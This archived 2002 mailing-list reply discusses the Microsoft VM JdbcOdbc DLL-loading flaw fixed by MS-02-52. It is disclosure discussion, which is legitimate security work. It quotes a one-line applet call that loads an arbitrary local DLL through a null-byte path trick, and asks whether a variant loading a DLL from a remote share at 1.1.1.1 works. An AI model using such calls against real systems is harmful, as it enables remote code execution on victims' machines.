Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52
From: Georgi Guninski (guninski@GUNINSKI.COM)Date: 09/23/02
- Previous message: Jouko Pynnonen: "Technical information about the vulnerabilities fixed by MS-02-52"
- In reply to: Jouko Pynnonen: "Technical information about the vulnerabilities fixed by MS-02-52"
- Next in thread: Jouko Pynnonen: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Reply: Jouko Pynnonen: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 23 Sep 2002 18:30:58 +0300 From: Georgi Guninski <guninski@GUNINSKI.COM> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Jouko Pynnonen wrote:
>
> can be freely chosen by a malicious applet. For instance to load the DLL
> "C:\mydll.dll" the applet can do
>
> new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");
>
Does
new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
work?
Georgi Guninski
- Previous message: Jouko Pynnonen: "Technical information about the vulnerabilities fixed by MS-02-52"
- In reply to: Jouko Pynnonen: "Technical information about the vulnerabilities fixed by MS-02-52"
- Next in thread: Jouko Pynnonen: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Reply: Jouko Pynnonen: "Re: [Full-Disclosure] Technical information about the vulnerabilities fixed by MS-02-52"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
